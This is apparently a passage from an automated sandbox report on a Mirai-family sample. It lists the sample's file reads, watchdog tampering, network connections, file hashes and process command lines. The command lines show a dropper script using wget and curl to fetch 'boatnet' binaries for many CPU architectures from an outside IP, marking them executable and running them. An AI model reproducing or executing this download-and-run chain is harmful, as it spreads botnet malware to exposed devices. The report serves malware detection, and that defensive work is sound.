| File opened for reading | /proc/857/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/774/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/878/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/839/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/691/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/701/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/809/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/827/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/875/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/663/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/697/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/698/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/863/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/669/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/747/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/801/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/819/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/836/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/886/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/670/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/696/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-db8c330f475845f099820e9f7a7cb108-systemd-timedated.service-Yx8mHQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
memory/744-1-0x00400000-0x00451a58-memory.dmp
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
debian9-mipsel-20240611-en
Max time kernel
149s
Max time network
137s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/786/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/791/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/875/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/435/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/684/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/710/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/681/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/682/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/712/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/874/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/887/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/669/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/708/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/709/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/822/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/893/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/898/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/886/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/899/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/859/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/676/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-287e404d3abd4327b83bfdb32f015081-systemd-timedated.service-BGSZk2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
